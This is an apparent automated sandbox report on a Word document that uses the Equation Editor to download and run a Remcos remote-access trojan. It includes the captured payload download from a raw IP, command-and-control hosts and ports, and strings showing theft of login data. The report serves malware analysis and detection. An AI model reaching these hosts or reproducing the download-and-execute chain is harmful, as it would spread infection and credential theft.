
                        Software Vulnerabilities

                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03540451 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03540451
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035404C0 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035404C0
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035404EE ShellExecuteW,ExitProcess,2_2_035404EE
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03540513 ExitProcess,2_2_03540513
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035403DF LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035403DF
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035404D9 ShellExecuteW,ExitProcess,2_2_035404D9
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035403C3 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035403C3
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035403AA ExitProcess,2_2_035403AA
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0354046B URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_0354046B
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: kenoss.duckdns.org
                        Source: global trafficDNS query: name: geoplugin.net
                        Source: global trafficDNS query: name: geoplugin.net
                        Source: global trafficDNS query: name: geoplugin.net
                        Source: global trafficDNS query: name: geoplugin.net
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: onedrive.live.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficDNS query: name: oqgpra.db.files.1drv.com
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 178.237.33.50:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49177 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49177 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49177 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49177 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 13.107.137.11:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 103.198.26.173:80
                        Source: global trafficTCP traffic: 103.198.26.173:80 -> 192.168.2.22:49163

                        Networking

                        Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49170 -> 103.186.117.100:1166
                        Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 103.186.117.100:1166 -> 192.168.2.22:49170
                        Source: Malware configuration extractorURLs: uckdns.org
                        Source: unknownDNS query: name: kenoss.duckdns.org
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0324C8AC InternetCheckConnectionA,5_2_0324C8AC
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540451 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03540451
                        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 103.186.117.100:1166
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Apr 2024 06:41:52 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Mon, 22 Apr 2024 08:30:20 GMTETag: "190400-616ab3f81c82f"Accept-Ranges: bytesContent-Length: 1639424Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 13.107.137.11 13.107.137.11
                        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                        Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
                        Source: Joe Sandbox ViewASN Name: NXGNET-AS-APNextgenNetworksAU NXGNET-AS-APNextgenNetworksAU
                        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                        Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21191&authkey=!ANO4kMGOfcJo8rs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                        Source: global trafficHTTP traffic detected: GET /360/HJC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.198.26.173Connection: Keep-Alive
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49165 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49168 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49175 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49178 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49181 version: TLS 1.0
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.198.26.173
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540451 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03540451
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AB72E720-F3E3-45DA-ADEC-6B3AF7E8AA01}.tmpJump to behavior
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                        Source: remcos.exe, 00000010.00000002.401505696.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                        Source: remcos.exe, 00000010.00000002.401505696.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                        Source: remcos.exe, 00000014.00000003.427845024.000000000062D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000002.429396704.000000000062D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427908408.000000000062D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://lo equals www.facebook.com (Facebook)
